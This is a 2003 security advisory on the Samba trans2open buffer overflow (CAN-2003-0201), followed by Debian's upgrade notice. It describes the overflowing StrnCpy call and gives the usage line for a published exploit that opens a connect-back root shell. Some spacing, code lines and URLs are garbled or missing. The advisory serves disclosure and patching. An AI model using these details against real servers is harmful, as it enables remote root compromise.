o Product description: Samba is an Open Source/Free Software suite that provides seamless file and print services to SMB/CIFS clients. Samba-TNG was originally a fork off of the Samba source tree, and aims at being a substitute for a Windows NT domain controller.

o Problem description: An anonymous user can gain remote root access due to a buffer overflow caused by a StrnCpy() into a char array (fname) using a non-constant length (namelen).

StrnCpy(fname,pname,namelen); /* Line 252 of smbd/trans2.c */

In the call_trans2open function in trans2.c, the Samba StrnCpy function copies pname into fname using namelen. The variable namelen is assigned the value of strlen(pname)+1, which causes the overflow.

The variable 'fname' is a _typedef_ pstring, which is a char with a size of 1024. If pname is greater than 1024, you can overwrite almost anything you want past the 1024th byte that fits inside of sizeof(pname), or the value returned by SVAL(inbuf,smbd_tpscnt) in function reply_trans2(), which should be around 2000 bytes.

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CAN-2003-0201 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.

o Testing Environment: Tested against source compiles and binary packages of Samba from version 2.2.5 to 2.2.8 on the following x86 platforms:

o Solutions and Workarounds: Upgrading to the latest version of Samba or Samba-TNG is the recommended solution to this vulnerability. Samba version 2.2.8a, and Samba-TNG version 0.3.2 are not vulnerable. There will be no new releases for the 2.0 line of Samba code. The only fix for Samba 2.0 is to apply the patches that Samba is providing.

A workaround in the current source code for this specific vulnerability would be to modify the StrnCpy line found at line 250 in smbd/trans2.c in the Samba 2.2.8 source code:

As a result of this vulnerability being identified at least three others have also been found by the Samba team after reviewing similar usages in the source tree. One is a static overflow and the other two are heap overflows. Applying the fix above will only protect against the specific problem identified in this advisory. To fully protect yourself, you must apply the patches from Samba, or upgrade to 2.2.8a.

o Exploit: An exploit named trans2root.pl has been posted on the Digital Defense, Inc. website. A quick udp based based scanner named nmbping.pl has also been posted to assist you in identifying Samba servers on your network. Both are available for download from the following URL:

This exploit works against all distributions listed in the testing environment section. Usage is as follows:

trans2root.pl <options> -t <target type> -H <your ip> -h <target ip>

This exploit should work against all x86 Linux, Solaris, and FreeBSD hosts running the 2.2.x branch of Samba. Hosts with a non-executable stack are not vulnerable to this particular exploit. The exploit will cause the target host to connect back to the host running the exploit and spawn a root shell on the defined port (default is 1981).

The scanner is very easy to use, and should detect and identify Samba and Windows SMB services. Usage is as follows:

nmbping.pl <network/cidr>

o Forced Release: This vulnerability is being actively exploited in the wild. Digital Defense, Inc. discovered this bug by analyzing a packet capture of an attack against a host running Samba 2.2.8. The attack captured was performed on April 1st, 2003. Samba users are urged to check their Samba servers for signs of compromise. Samba and Digital Defense, Inc. decided to release their advisories before all vendors had a chance to update their packages due to this vulnerability being actively exploited.

Digital Defense, Inc. has alerted the Samba Team to a seriousvulnerability in, a LanManager-like file and printer server for Unix.This vulnerability can lead to an anonymous user gaining root accesson a Samba serving system. An exploit for this problem is alreadycirculating and in use.

Since the packags for potato are quite old it is likely that theycontain more security-relevant bugs that we know of. You aretherefore advised to upgrade your systems running Samba to woodysoon.

Unofficial backported packages from the Samba maintainers for version2.2.8 of Samba for woody are available at<http://poeple.debian.org/~peloy/> and<http://poeple.debian.org/~vorlon/>.

For the stable distribution (woody) this problem has been fixed inversion 2.2.3a-12.3.

For the old stable distribution (potato) this problem has been fixed inversion 2.0.7-5.1.

The unstable distribution (sid) is not affected since it containsversion 3.0 packages already.

We recommend that you upgrade your Samba packages immediately.

Upgrade Instructions- --------------------

wget url will fetch the file for youdpkg -i file.deb will install the referenced file.

If you are using the apt-get package manager, use the line forsources.list as given below: